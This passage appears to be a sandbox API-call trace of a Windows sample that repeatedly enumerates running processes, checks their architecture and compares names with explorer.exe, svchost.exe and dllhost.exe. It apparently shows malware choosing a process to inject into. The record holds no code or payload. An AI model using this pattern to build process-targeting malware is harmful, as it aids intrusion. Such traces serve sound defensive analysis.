th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0181.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0181.012] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0181.012] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0181.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0181.013] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0181.013] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0181.014] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.014] CloseHandle (hObject=0xd8) returned 1 [0181.014] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0181.014] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0181.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0181.014] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.014] CloseHandle (hObject=0xd8) returned 1 [0181.014] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0181.014] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0181.014] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0181.014] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0181.015] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0181.040] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.040] CloseHandle (hObject=0xd8) returned 1 [0181.040] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0181.041] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.041] CloseHandle (hObject=0xd8) returned 1 [0181.041] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0181.041] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0181.042] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.042] CloseHandle (hObject=0xd8) returned 1 [0181.042] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.042] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0181.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0181.043] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.043] CloseHandle (hObject=0xd8) returned 1 [0181.043] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0181.043] CloseHandle (hObject=0xd4) returned 1 [0181.043] Sleep (dwMilliseconds=0x3e8) [0182.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0182.060] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0182.061] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0182.062] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0182.062] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0182.063] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0182.063] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0182.064] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0182.064] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0182.065] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0182.065] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0182.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0182.066] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0182.067] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0182.067] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0182.068] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0182.068] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0182.069] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0182.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0182.069] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0182.070] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0182.070] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0182.071] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.071] CloseHandle (hObject=0xd8) returned 1 [0182.071] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0182.071] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0182.071] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0182.071] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0182.071] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0182.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0182.072] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.072] CloseHandle (hObject=0xd8) returned 1 [0182.072] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0182.072] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0182.072] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0182.072] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0182.073] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0182.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0182.073] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0182.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0182.074] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.074] CloseHandle (hObject=0xd8) returned 1 [0182.074] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0182.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0182.074] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.074] CloseHandle (hObject=0xd8) returned 1 [0182.074] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0182.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0182.075] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.075] CloseHandle (hObject=0xd8) returned 1 [0182.075] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0182.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0182.075] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.075] CloseHandle (hObject=0xd8) returned 1 [0182.075] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0182.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0182.076] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.076] CloseHandle (hObject=0xd8) returned 1 [0182.076] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0182.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0182.077] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.077] CloseHandle (hObject=0xd8) returned 1 [0182.077] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0182.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0182.077] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.077] CloseHandle (hObject=0xd8) returned 1 [0182.077] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0182.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0182.078] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.078] CloseHandle (hObject=0xd8) returned 1 [0182.078] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0182.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0182.079] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.079] CloseHandle (hObject=0xd8) returned 1 [0182.079] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0182.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0182.079] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.079] CloseHandle (hObject=0xd8) returned 1 [0182.079] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0182.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0182.080] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.080] CloseHandle (hObject=0xd8) returned 1 [0182.080] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0182.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0182.080] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.080] CloseHandle (hObject=0xd8) returned 1 [0182.080] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0182.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0182.081] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.081] CloseHandle (hObject=0xd8) returned 1 [0182.081] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0182.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0182.082] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.082] CloseHandle (hObject=0xd8) returned 1 [0182.082] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0182.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0182.082] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.082] CloseHandle (hObject=0xd8) returned 1 [0182.082] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0182.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0182.083] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.083] CloseHandle (hObject=0xd8) returned 1 [0182.083] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0182.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0182.084] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0182.084] CloseHandle 